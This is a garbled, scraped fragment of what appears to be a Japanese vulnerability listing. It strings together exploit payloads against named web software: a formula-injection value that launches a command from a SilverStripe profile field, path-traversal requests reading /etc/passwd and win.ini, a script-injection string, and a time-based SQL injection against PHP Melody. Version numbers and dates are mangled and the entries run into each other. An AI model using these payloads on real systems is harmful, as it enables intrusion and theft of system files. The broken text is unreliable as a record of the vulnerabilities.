FirstName=System+%40SUM(%B)*cmd%7C'+%FC+cal SilverStripe CMS SilverStripe CMS.6. c'!a0&surname=administrator&email=demos%40softaculous.com&password%5b_currentpassword%5d=&password%5b _Password%5D=&Password%5B_ConfirmPassword%5D=&P assword%5b_passwordfieldvisible%5d=&locale=en_us&fail edlogincount=0&directgroups%5b%5d=&classname=silv erstripe%5csecurity%5cmember&securityid=fbdb5074d 8c554bf559904a4c60&ID=&action_save=&Ba ckurl=https%a%f%fdemos.softaculous.com%fsilver Stripe%Fadmin%Fmyprofile /wt/forcesave.php?file=/etc/passwd service_id="><script>alert()</script>&provider_id=8 5 Xerox DC60 EFI Fiery Controller Webtools Xerox DC60 EFI Fiery Controller Webtools.0 POST /easyappointments/index.php/appointments/ajax_get_ava ilable_hours HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 Easy!Appointments Easy!Appointments.. 07--7 4405 Directory Traversal 易高 DotNetNuke DreamSlider 0.0.0 - Arbitrary File Download 脆弱性 /DesktopModules/DreamSlider/DownloadProvider.aspx?File=/..\..\..\..\..\..\winnt\win.ini DotNetNuke DreamSlider DotNetNuke DreamSlider 0.0.0 07-- 4409 SQL Injection 中早急対応要 PHP Melody.7. - 'playlist' /ajax.php?p=video&do=getplayer&vid=randomid&aid=&play er=detail&playlist='+(select*from(select(sleep(0)))a)+' PHP Melody PHP Melody.7.

2026 © docsplayer.net プライバシー | 利用規約 | フィードバック